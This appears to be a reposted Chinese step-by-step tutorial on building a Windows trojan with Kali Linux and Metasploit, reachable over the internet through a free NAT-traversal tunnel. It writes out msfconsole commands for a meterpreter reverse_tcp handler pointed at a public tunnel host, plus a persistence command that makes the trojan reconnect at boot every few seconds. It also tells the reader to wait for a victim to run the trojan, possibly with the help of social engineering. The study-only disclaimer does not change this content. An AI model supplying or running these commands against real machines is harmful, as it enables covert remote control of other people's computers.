前言
實(shí)現(xiàn)外網(wǎng)控制需要一個(gè)外網(wǎng)的IP負(fù)責(zé)監(jiān)聽,本次使用的是https://www.fgnwct.com(飛鴿內(nèi)網(wǎng)穿透)有免費(fèi)的隧道 kali.org(kali官網(wǎng)) 詳細(xì)教程查詢官網(wǎng)。
此系列僅用于工作和學(xué)習(xí),禁止用于非法攻擊。一切遵守《網(wǎng)絡(luò)安全法》文章來源:http://www.zghlxwxcb.cn/news/detail-425811.html
環(huán)境 windows7 kali linux 2021文章來源地址http://www.zghlxwxcb.cn/news/detail-425811.html
下載客戶端,解壓出文件 ''NPC''

放到kali linux 桌面上

這里選擇 tcp協(xié)議,本地端口隨意填(最好不要填常用的可能被占用的端口)

復(fù)制命令,打開kali

網(wǎng)絡(luò)選擇(橋接模式)

在kali終端里面啟動(dòng)(要和npc文件在同一個(gè)路徑下!)成功連上服務(wù)器

創(chuàng)建一個(gè)木馬,這里要填服務(wù)器的!


打開msfconsole(輸入以下命令)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost [公網(wǎng)服務(wù)器的名稱 如:free.svipss.top]
set lport [自己設(shè)置的隧道監(jiān)聽端口]
run

等待受害者點(diǎn)擊此木馬(可能要運(yùn)用到社會(huì)工程學(xué))
回到kali 木馬連接成功

如果想要 木馬持久化連接要用到別的模塊
run persistence -X -i 3 -r [公網(wǎng)服務(wù)器名稱 如:free.svipss.top] -p [公網(wǎng)端口]
-X //開機(jī)自啟動(dòng)
-i //回連的時(shí)間間隔 (-i 3 代表每3秒鐘連接我們一次)
-r //目標(biāo)機(jī)器 IP 地址(攻擊主機(jī))
-p //監(jiān)聽反向連接端口號

注(需要在windows7靶機(jī)上重啟計(jì)算機(jī)才能實(shí)現(xiàn))
到了這里,關(guān)于Kali linux windows木馬(外網(wǎng)) 保姆級教學(xué)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!